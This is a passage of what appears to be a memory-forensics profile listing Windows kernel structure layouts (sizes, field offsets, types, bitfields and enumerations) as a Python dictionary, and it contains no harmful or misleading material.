'TimeCheck' : [ 0x8, ['unsigned long']],
'IncreaseTime' : [ 0xc, ['unsigned long']],
'DecreaseTime' : [ 0x10, ['unsigned long']],
'IncreasePercent' : [ 0x14, ['unsigned long']],
'DecreasePercent' : [ 0x18, ['unsigned long']],
} ],
'_BUS_EXTENSION_LIST' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['void']]],
'BusExtension' : [ 0x4, ['pointer', ['_PI_BUS_EXTENSION']]],
} ],
'_CACHED_CHILD_LIST' : [ 0x8, {
'Count' : [ 0x0, ['unsigned long']],
'ValueList' : [ 0x4, ['unsigned long']],
'RealKcb' : [ 0x4, ['pointer', ['_CM_KEY_CONTROL_BLOCK']]],
} ],
'_KDEVICE_QUEUE' : [ 0x14, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'DeviceListHead' : [ 0x4, ['_LIST_ENTRY']],
'Lock' : [ 0xc, ['unsigned long']],
'Busy' : [ 0x10, ['unsigned char']],
} ],
'_SYSTEM_POWER_STATE_CONTEXT' : [ 0x4, {
'Reserved1' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long')]],
'TargetSystemState' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 12, native_type='unsigned long')]],
'EffectiveSystemState' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 16, native_type='unsigned long')]],
'CurrentSystemState' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 20, native_type='unsigned long')]],
'IgnoreHibernationPath' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'PseudoTransition' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'Reserved2' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 32, native_type='unsigned long')]],
'ContextAsUlong' : [ 0x0, ['unsigned long']],
} ],
'_OBJECT_TYPE_INITIALIZER' : [ 0x50, {
'Length' : [ 0x0, ['unsigned short']],
'ObjectTypeFlags' : [ 0x2, ['unsigned char']],
'CaseInsensitive' : [ 0x2, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'UnnamedObjectsOnly' : [ 0x2, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'UseDefaultObject' : [ 0x2, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'SecurityRequired' : [ 0x2, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'MaintainHandleCount' : [ 0x2, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'MaintainTypeList' : [ 0x2, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'SupportsObjectCallbacks' : [ 0x2, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'ObjectTypeCode' : [ 0x4, ['unsigned long']],
'InvalidAttributes' : [ 0x8, ['unsigned long']],
'GenericMapping' : [ 0xc, ['_GENERIC_MAPPING']],
'ValidAccessMask' : [ 0x1c, ['unsigned long']],
'RetainAccess' : [ 0x20, ['unsigned long']],
'PoolType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'DefaultPagedPoolCharge' : [ 0x28, ['unsigned long']],
'DefaultNonPagedPoolCharge' : [ 0x2c, ['unsigned long']],
'DumpProcedure' : [ 0x30, ['pointer', ['void']]],
'OpenProcedure' : [ 0x34, ['pointer', ['void']]],
'CloseProcedure' : [ 0x38, ['pointer', ['void']]],
'DeleteProcedure' : [ 0x3c, ['pointer', ['void']]],
'ParseProcedure' : [ 0x40, ['pointer', ['void']]],
'SecurityProcedure' : [ 0x44, ['pointer', ['void']]],
'QueryNameProcedure' : [ 0x48, ['pointer', ['void']]],
'OkayToCloseProcedure' : [ 0x4c, ['pointer', ['void']]],
} ],
'__unnamed_1ef2' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'SubsectionFlags' : [ 0x0, ['_MMSUBSECTION_FLAGS']],
} ],
'_SUBSECTION' : [ 0x20, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'SubsectionBase' : [ 0x4, ['pointer', ['_MMPTE']]],
'NextSubsection' : [ 0x8, ['pointer', ['_SUBSECTION']]],
'PtesInSubsection' : [ 0xc, ['unsigned long']],
'UnusedPtes' : [ 0x10, ['unsigned long']],
'GlobalPerSessionHead' : [ 0x10, ['pointer', ['_MM_AVL_TABLE']]],
'u' : [ 0x14, ['__unnamed_1ef2']],
'StartingSector' : [ 0x18, ['unsigned long']],
'NumberOfFullSectors' : [ 0x1c, ['unsigned long']],
} ],
'_IO_CLIENT_EXTENSION' : [ 0x8, {
'NextExtension' : [ 0x0, ['pointer', ['_IO_CLIENT_EXTENSION']]],
'ClientIdentificationAddress' : [ 0x4, ['pointer', ['void']]],
} ],
'_PS_PER_CPU_QUOTA_CACHE_AWARE' : [ 0x40, {
'SortedListEntry' : [ 0x0, ['_LIST_ENTRY']],
'IdleOnlyListHead' : [ 0x8, ['_LIST_ENTRY']],
'CycleBaseAllowance' : [ 0x10, ['unsigned long long']],
'CyclesRemaining' : [ 0x18, ['long long']],
'CurrentGeneration' : [ 0x20, ['unsigned long']],
} ],
'_ETW_BUFFER_CONTEXT' : [ 0x4, {
'ProcessorNumber' : [ 0x0, ['unsigned char']],
'Alignment' : [ 0x1, ['unsigned char']],
'LoggerId' : [ 0x2, ['unsigned short']],
} ],
'_PROC_IDLE_SNAP' : [ 0x10, {
'Time' : [ 0x0, ['unsigned long long']],
'Idle' : [ 0x8, ['unsigned long long']],
} ],
'_KERNEL_STACK_SEGMENT' : [ 0x14, {
'StackBase' : [ 0x0, ['unsigned long']],
'StackLimit' : [ 0x4, ['unsigned long']],
'KernelStack' : [ 0x8, ['unsigned long']],
'InitialStack' : [ 0xc, ['unsigned long']],
'ActualLimit' : [ 0x10, ['unsigned long']],
} ],
'_KEXECUTE_OPTIONS' : [ 0x1, {
'ExecuteDisable' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'ExecuteEnable' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'DisableThunkEmulation' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Permanent' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'ExecuteDispatchEnable' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'ImageDispatchEnable' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'DisableExceptionChainValidation' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'ExecuteOptions' : [ 0x0, ['unsigned char']],
} ],
'_SEP_TOKEN_PRIVILEGES' : [ 0x18, {
'Present' : [ 0x0, ['unsigned long long']],
'Enabled' : [ 0x8, ['unsigned long long']],
'EnabledByDefault' : [ 0x10, ['unsigned long long']],
} ],
'_WORK_QUEUE_ITEM' : [ 0x10, {
'List' : [ 0x0, ['_LIST_ENTRY']],
'WorkerRoutine' : [ 0x8, ['pointer', ['void']]],
'Parameter' : [ 0xc, ['pointer', ['void']]],
} ],
'_ARBITER_ALLOCATION_STATE' : [ 0x38, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'CurrentMinimum' : [ 0x10, ['unsigned long long']],
'CurrentMaximum' : [ 0x18, ['unsigned long long']],
'Entry' : [ 0x20, ['pointer', ['_ARBITER_LIST_ENTRY']]],
'CurrentAlternative' : [ 0x24, ['pointer', ['_ARBITER_ALTERNATIVE']]],
'AlternativeCount' : [ 0x28, ['unsigned long']],
'Alternatives' : [ 0x2c, ['pointer', ['_ARBITER_ALTERNATIVE']]],
'Flags' : [ 0x30, ['unsigned short']],
'RangeAttributes' : [ 0x32, ['unsigned char']],
'RangeAvailableAttributes' : [ 0x33, ['unsigned char']],
'WorkSpace' : [ 0x34, ['unsigned long']],
} ],
'_VACB_ARRAY_HEADER' : [ 0x10, {
'VacbArrayIndex' : [ 0x0, ['unsigned long']],
'MappingCount' : [ 0x4, ['unsigned long']],
'HighestMappedIndex' : [ 0x8, ['unsigned long']],
'Reserved' : [ 0xc, ['unsigned long']],
} ],
'_MMWSLENTRY' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Hashed' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Direct' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Protection' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 9, native_type='unsigned long')]],
'Age' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 12, native_type='unsigned long')]],
'VirtualPageNumber' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 32, native_type='unsigned long')]],
} ],
'_DBGKD_SWITCH_PARTITION' : [ 0x4, {
'Partition' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_GET_VERSION32' : [ 0x28, {
'MajorVersion' : [ 0x0, ['unsigned short']],
'MinorVersion' : [ 0x2, ['unsigned short']],
'ProtocolVersion' : [ 0x4, ['unsigned short']],
'Flags' : [ 0x6, ['unsigned short']],
'KernBase' : [ 0x8, ['unsigned long']],
'PsLoadedModuleList' : [ 0xc, ['unsigned long']],
'MachineType' : [ 0x10, ['unsigned short']],
'ThCallbackStack' : [ 0x12, ['unsigned short']],
'NextCallback' : [ 0x14, ['unsigned short']],
'FramePointer' : [ 0x16, ['unsigned short']],
'KiCallUserMode' : [ 0x18, ['unsigned long']],
'KeUserCallbackDispatcher' : [ 0x1c, ['unsigned long']],
'BreakpointWithStatus' : [ 0x20, ['unsigned long']],
'DebuggerDataList' : [ 0x24, ['unsigned long']],
} ],
'_INTERLOCK_SEQ' : [ 0x8, {
'Depth' : [ 0x0, ['unsigned short']],
'FreeEntryOffset' : [ 0x2, ['unsigned short']],
'OffsetAndDepth' : [ 0x0, ['unsigned long']],
'Sequence' : [ 0x4, ['unsigned long']],
'Exchg' : [ 0x0, ['long long']],
} ],
'_WHEA_TIMESTAMP' : [ 0x8, {
'Seconds' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 8, native_type='unsigned long long')]],
'Minutes' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 16, native_type='unsigned long long')]],
'Hours' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 24, native_type='unsigned long long')]],
'Precise' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 32, native_type='unsigned long long')]],
'Day' : [ 0x0, ['BitField', dict(start_bit = 32, end_bit = 40, native_type='unsigned long long')]],
'Month' : [ 0x0, ['BitField', dict(start_bit = 40, end_bit = 48, native_type='unsigned long long')]],
'Year' : [ 0x0, ['BitField', dict(start_bit = 48, end_bit = 56, native_type='unsigned long long')]],
'Century' : [ 0x0, ['BitField', dict(start_bit = 56, end_bit = 64, native_type='unsigned long long')]],
'AsLARGE_INTEGER' : [ 0x0, ['_LARGE_INTEGER']],
} ],
'_VPB' : [ 0x58, {
'Type' : [ 0x0, ['short']],
'Size' : [ 0x2, ['short']],
'Flags' : [ 0x4, ['unsigned short']],
'VolumeLabelLength' : [ 0x6, ['unsigned short']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'RealDevice' : [ 0xc, ['pointer', ['_DEVICE_OBJECT']]],
'SerialNumber' : [ 0x10, ['unsigned long']],
'ReferenceCount' : [ 0x14, ['unsigned long']],
'VolumeLabel' : [ 0x18, ['array', 32, ['wchar']]],
} ],
'_CACHE_DESCRIPTOR' : [ 0xc, {
'Level' : [ 0x0, ['unsigned char']],
'Associativity' : [ 0x1, ['unsigned char']],
'LineSize' : [ 0x2, ['unsigned short']],
'Size' : [ 0x4, ['unsigned long']],
'Type' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'CacheUnified', 1: 'CacheInstruction', 2: 'CacheData', 3: 'CacheTrace'})]],
} ],
'_FILE_BASIC_INFORMATION' : [ 0x28, {
'CreationTime' : [ 0x0, ['_LARGE_INTEGER']],
'LastAccessTime' : [ 0x8, ['_LARGE_INTEGER']],
'LastWriteTime' : [ 0x10, ['_LARGE_INTEGER']],
'ChangeTime' : [ 0x18, ['_LARGE_INTEGER']],
'FileAttributes' : [ 0x20, ['unsigned long']],
} ],
'_SECURITY_SUBJECT_CONTEXT' : [ 0x10, {
'ClientToken' : [ 0x0, ['pointer', ['void']]],
'ImpersonationLevel' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'SecurityAnonymous', 1: 'SecurityIdentification', 2: 'SecurityImpersonation', 3: 'SecurityDelegation'})]],
'PrimaryToken' : [ 0x8, ['pointer', ['void']]],
'ProcessAuditId' : [ 0xc, ['pointer', ['void']]],
} ],
'_KiIoAccessMap' : [ 0x2024, {
'DirectionMap' : [ 0x0, ['array', 32, ['unsigned char']]],
'IoMap' : [ 0x20, ['array', 8196, ['unsigned char']]],
} ],
'_PF_KERNEL_GLOBALS' : [ 0x40, {
'AccessBufferAgeThreshold' : [ 0x0, ['unsigned long long']],
'AccessBufferRef' : [ 0x8, ['_EX_RUNDOWN_REF']],
'AccessBufferExistsEvent' : [ 0xc, ['_KEVENT']],
'AccessBufferMax' : [ 0x1c, ['unsigned long']],
'AccessBufferList' : [ 0x20, ['_SLIST_HEADER']],
'StreamSequenceNumber' : [ 0x28, ['long']],
'Flags' : [ 0x2c, ['unsigned long']],
'ScenarioPrefetchCount' : [ 0x30, ['long']],
} ],
'_ARBITER_QUERY_ARBITRATE_PARAMETERS' : [ 0x4, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
} ],
'_ARBITER_BOOT_ALLOCATION_PARAMETERS' : [ 0x4, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
} ],
'_POP_SYSTEM_IDLE' : [ 0x38, {
'AverageIdleness' : [ 0x0, ['long']],
'LowestIdleness' : [ 0x4, ['long']],
'Time' : [ 0x8, ['unsigned long']],
'Timeout' : [ 0xc, ['unsigned long']],
'LastUserInput' : [ 0x10, ['unsigned long']],
'Action' : [ 0x14, ['POWER_ACTION_POLICY']],
'MinState' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SystemRequired' : [ 0x24, ['unsigned char']],
'IdleWorker' : [ 0x25, ['unsigned char']],
'Sampling' : [ 0x26, ['unsigned char']],
'LastTick' : [ 0x28, ['unsigned long long']],
'LastSystemRequiredTime' : [ 0x30, ['unsigned long']],
} ],
'_VF_TARGET_ALL_SHARED_EXPORT_THUNKS' : [ 0xc, {
'SharedExportThunks' : [ 0x0, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
'PoolSharedExportThunks' : [ 0x4, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
'OrderDependentSharedExportThunks' : [ 0x8, ['pointer', ['_VERIFIER_SHARED_EXPORT_THUNK']]],
} ],
'_ETW_REF_CLOCK' : [ 0x10, {
'StartTime' : [ 0x0, ['_LARGE_INTEGER']],
'StartPerfClock' : [ 0x8, ['_LARGE_INTEGER']],
} ],
'_OB_DUPLICATE_OBJECT_STATE' : [ 0x18, {
'SourceProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
'SourceHandle' : [ 0x4, ['pointer', ['void']]],
'Object' : [ 0x8, ['pointer', ['void']]],
'TargetAccess' : [ 0xc, ['unsigned long']],
'ObjectInfo' : [ 0x10, ['_HANDLE_TABLE_ENTRY_INFO']],
'HandleAttributes' : [ 0x14, ['unsigned long']],
} ],
'_MMPTE_SUBSECTION' : [ 0x4, {
'Valid' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'SubsectionAddressLow' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 10, native_type='unsigned long')]],
'Prototype' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'SubsectionAddressHigh' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 32, native_type='unsigned long')]],
} ],
'_POWER_STATE' : [ 0x4, {
'SystemState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DeviceState' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
} ],
'_EFI_FIRMWARE_INFORMATION' : [ 0x10, {
'FirmwareVersion' : [ 0x0, ['unsigned long']],
'VirtualEfiRuntimeServices' : [ 0x4, ['pointer', ['_VIRTUAL_EFI_RUNTIME_SERVICES']]],
'SetVirtualAddressMapStatus' : [ 0x8, ['long']],
'MissedMappingsCount' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_1f53' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f55' : [ 0xc, {
'Level' : [ 0x0, ['unsigned short']],
'Group' : [ 0x2, ['unsigned short']],
'Vector' : [ 0x4, ['unsigned long']],
'Affinity' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f57' : [ 0xc, {
'Group' : [ 0x0, ['unsigned short']],
'MessageCount' : [ 0x2, ['unsigned short']],
'Vector' : [ 0x4, ['unsigned long']],
'Affinity' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f59' : [ 0xc, {
'Raw' : [ 0x0, ['__unnamed_1f57']],
'Translated' : [ 0x0, ['__unnamed_1f55']],
} ],
'__unnamed_1f5b' : [ 0xc, {
'Channel' : [ 0x0, ['unsigned long']],
'Port' : [ 0x4, ['unsigned long']],
'Reserved1' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f5d' : [ 0xc, {
'Start' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
'Reserved' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f5f' : [ 0xc, {
'DataSize' : [ 0x0, ['unsigned long']],
'Reserved1' : [ 0x4, ['unsigned long']],
'Reserved2' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f61' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length40' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f63' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length48' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f65' : [ 0xc, {
'Start' : [ 0x0, ['_LARGE_INTEGER']],
'Length64' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_1f67' : [ 0xc, {
'Generic' : [ 0x0, ['__unnamed_1f53']],
'Port' : [ 0x0, ['__unnamed_1f53']],
'Interrupt' : [ 0x0, ['__unnamed_1f55']],
'MessageInterrupt' : [ 0x0, ['__unnamed_1f59']],
'Memory' : [ 0x0, ['__unnamed_1f53']],
'Dma' : [ 0x0, ['__unnamed_1f5b']],
'DevicePrivate' : [ 0x0, ['__unnamed_1e3f']],
'BusNumber' : [ 0x0, ['__unnamed_1f5d']],
'DeviceSpecificData' : [ 0x0, ['__unnamed_1f5f']],
'Memory40' : [ 0x0, ['__unnamed_1f61']],
'Memory48' : [ 0x0, ['__unnamed_1f63']],
'Memory64' : [ 0x0, ['__unnamed_1f65']],
} ],
'_CM_PARTIAL_RESOURCE_DESCRIPTOR' : [ 0x10, {
'Type' : [ 0x0, ['unsigned char']],
'ShareDisposition' : [ 0x1, ['unsigned char']],
'Flags' : [ 0x2, ['unsigned short']],
'u' : [ 0x4, ['__unnamed_1f67']],
} ],
'__unnamed_1f6c' : [ 0x4, {
'PhysicalAddress' : [ 0x0, ['unsigned long']],
'VirtualSize' : [ 0x0, ['unsigned long']],
} ],
'_IMAGE_SECTION_HEADER' : [ 0x28, {
'Name' : [ 0x0, ['array', 8, ['unsigned char']]],
'Misc' : [ 0x8, ['__unnamed_1f6c']],
'VirtualAddress' : [ 0xc, ['unsigned long']],
'SizeOfRawData' : [ 0x10, ['unsigned long']],
'PointerToRawData' : [ 0x14, ['unsigned long']],
'PointerToRelocations' : [ 0x18, ['unsigned long']],
'PointerToLinenumbers' : [ 0x1c, ['unsigned long']],
'NumberOfRelocations' : [ 0x20, ['unsigned short']],
'NumberOfLinenumbers' : [ 0x22, ['unsigned short']],
'Characteristics' : [ 0x24, ['unsigned long']],
} ],
'_ARBITER_ADD_RESERVED_PARAMETERS' : [ 0x4, {
'ReserveDevice' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'__unnamed_1f76' : [ 0x50, {
'CellData' : [ 0x0, ['_CELL_DATA']],
'List' : [ 0x0, ['array', 1, ['unsigned long']]],
} ],
'_CM_CACHED_VALUE_INDEX' : [ 0x54, {
'CellIndex' : [ 0x0, ['unsigned long']],
'Data' : [ 0x4, ['__unnamed_1f76']],
} ],
'_CONFIGURATION_COMPONENT_DATA' : [ 0x34, {
'Parent' : [ 0x0, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'Child' : [ 0x4, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'Sibling' : [ 0x8, ['pointer', ['_CONFIGURATION_COMPONENT_DATA']]],
'ComponentEntry' : [ 0xc, ['_CONFIGURATION_COMPONENT']],
'ConfigurationData' : [ 0x30, ['pointer', ['void']]],
} ],
'_DBGKD_QUERY_SPECIAL_CALLS' : [ 0x4, {
'NumberOfSpecialCalls' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1f80' : [ 0x4, {
'Balance' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='long')]],
'Parent' : [ 0x0, ['pointer', ['_MMSUBSECTION_NODE']]],
} ],
'_MMSUBSECTION_NODE' : [ 0x18, {
'u' : [ 0x0, ['__unnamed_1ef2']],
'StartingSector' : [ 0x4, ['unsigned long']],
'NumberOfFullSectors' : [ 0x8, ['unsigned long']],
'u1' : [ 0xc, ['__unnamed_1f80']],
'LeftChild' : [ 0x10, ['pointer', ['_MMSUBSECTION_NODE']]],
'RightChild' : [ 0x14, ['pointer', ['_MMSUBSECTION_NODE']]],
} ],
'_VF_AVL_TREE_NODE' : [ 0x8, {
'p' : [ 0x0, ['pointer', ['void']]],
'RangeSize' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1f88' : [ 0x8, {
'IdleTime' : [ 0x0, ['unsigned long']],
'NonIdleTime' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_1f8a' : [ 0x8, {
'Disk' : [ 0x0, ['__unnamed_1f88']],
} ],
'_DEVICE_OBJECT_POWER_EXTENSION' : [ 0x40, {
'IdleCount' : [ 0x0, ['unsigned long']],
'BusyCount' : [ 0x4, ['unsigned long']],
'BusyReference' : [ 0x8, ['unsigned long']],
'TotalBusyCount' : [ 0xc, ['unsigned long']],
'ConservationIdleTime' : [ 0x10, ['unsigned long']],
'PerformanceIdleTime' : [ 0x14, ['unsigned long']],
'DeviceObject' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'IdleList' : [ 0x1c, ['_LIST_ENTRY']],
'IdleType' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'DeviceIdleNormal', 1: 'DeviceIdleDisk'})]],
'IdleState' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'CurrentState' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerDeviceUnspecified', 1: 'PowerDeviceD0', 2: 'PowerDeviceD1', 3: 'PowerDeviceD2', 4: 'PowerDeviceD3', 5: 'PowerDeviceMaximum'})]],
'Volume' : [ 0x30, ['_LIST_ENTRY']],
'Specific' : [ 0x38, ['__unnamed_1f8a']],
} ],
'_ARBITER_RETEST_ALLOCATION_PARAMETERS' : [ 0xc, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'AllocateFromCount' : [ 0x4, ['unsigned long']],
'AllocateFrom' : [ 0x8, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS' : [ 0x1, {
'FRUId' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'FRUText' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 8, native_type='unsigned char')]],
'AsUCHAR' : [ 0x0, ['unsigned char']],
} ],
'_FS_FILTER_CALLBACKS' : [ 0x38, {
'SizeOfFsFilterCallbacks' : [ 0x0, ['unsigned long']],
'Reserved' : [ 0x4, ['unsigned long']],
'PreAcquireForSectionSynchronization' : [ 0x8, ['pointer', ['void']]],
'PostAcquireForSectionSynchronization' : [ 0xc, ['pointer', ['void']]],
'PreReleaseForSectionSynchronization' : [ 0x10, ['pointer', ['void']]],
'PostReleaseForSectionSynchronization' : [ 0x14, ['pointer', ['void']]],
'PreAcquireForCcFlush' : [ 0x18, ['pointer', ['void']]],
'PostAcquireForCcFlush' : [ 0x1c, ['pointer', ['void']]],
'PreReleaseForCcFlush' : [ 0x20, ['pointer', ['void']]],
'PostReleaseForCcFlush' : [ 0x24, ['pointer', ['void']]],
'PreAcquireForModifiedPageWriter' : [ 0x28, ['pointer', ['void']]],
'PostAcquireForModifiedPageWriter' : [ 0x2c, ['pointer', ['void']]],
'PreReleaseForModifiedPageWriter' : [ 0x30, ['pointer', ['void']]],
'PostReleaseForModifiedPageWriter' : [ 0x34, ['pointer', ['void']]],
} ],
'_KENLISTMENT' : [ 0x168, {
'cookie' : [ 0x0, ['unsigned long']],
'NamespaceLink' : [ 0x4, ['_KTMOBJECT_NAMESPACE_LINK']],
'EnlistmentId' : [ 0x18, ['_GUID']],
'Mutex' : [ 0x28, ['_KMUTANT']],
'NextSameTx' : [ 0x48, ['_LIST_ENTRY']],
'NextSameRm' : [ 0x50, ['_LIST_ENTRY']],
'ResourceManager' : [ 0x58, ['pointer', ['_KRESOURCEMANAGER']]],
'Transaction' : [ 0x5c, ['pointer', ['_KTRANSACTION']]],
'State' : [ 0x60, ['Enumeration', dict(target = 'long', choices = {0: 'KEnlistmentUninitialized', 256: 'KEnlistmentActive', 258: 'KEnlistmentPrepared', 259: 'KEnlistmentInDoubt', 260: 'KEnlistmentCommitted', 261: 'KEnlistmentCommittedNotify', 262: 'KEnlistmentCommitRequested', 257: 'KEnlistmentPreparing', 264: 'KEnlistmentDelegated', 265: 'KEnlistmentDelegatedDisconnected', 266: 'KEnlistmentPrePreparing', 263: 'KEnlistmentAborted', 268: 'KEnlistmentRecovering', 269: 'KEnlistmentAborting', 270: 'KEnlistmentReadOnly', 271: 'KEnlistmentOutcomeUnavailable', 272: 'KEnlistmentOffline', 273: 'KEnlistmentPrePrepared', 274: 'KEnlistmentInitialized', 267: 'KEnlistmentForgotten'})]],
'Flags' : [ 0x64, ['unsigned long']],
'NotificationMask' : [ 0x68, ['unsigned long']],
'Key' : [ 0x6c, ['pointer', ['void']]],
'KeyRefCount' : [ 0x70, ['unsigned long']],
'RecoveryInformation' : [ 0x74, ['pointer', ['void']]],
'RecoveryInformationLength' : [ 0x78, ['unsigned long']],
'DynamicNameInformation' : [ 0x7c, ['pointer', ['void']]],
'DynamicNameInformationLength' : [ 0x80, ['unsigned long']],
'FinalNotification' : [ 0x84, ['pointer', ['_KTMNOTIFICATION_PACKET']]],
'SupSubEnlistment' : [ 0x88, ['pointer', ['_KENLISTMENT']]],
'SupSubEnlHandle' : [ 0x8c, ['pointer', ['void']]],
'SubordinateTxHandle' : [ 0x90, ['pointer', ['void']]],
'CrmEnlistmentEnId' : [ 0x94, ['_GUID']],
'CrmEnlistmentTmId' : [ 0xa4, ['_GUID']],
'CrmEnlistmentRmId' : [ 0xb4, ['_GUID']],
'NextHistory' : [ 0xc4, ['unsigned long']],
